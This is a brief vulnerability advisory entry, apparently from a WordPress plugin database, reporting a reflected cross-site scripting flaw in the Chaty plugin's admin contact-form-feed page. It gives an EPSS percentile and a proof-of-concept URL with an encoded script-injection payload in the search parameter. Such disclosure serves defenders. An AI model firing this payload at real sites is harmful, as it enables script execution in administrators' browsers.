EPSS
Percentile
46.7%
The plugins do not sanitise and escape the search parameter before outputting it back in the admin dashboard, leading to a Reflected Cross-Site Scripting
http://example.com/wp-admin/admin.php?page=chaty-contact-form-feed&search;=<%2Fscript><img+src+onerror%3Dalert(/XSS/)>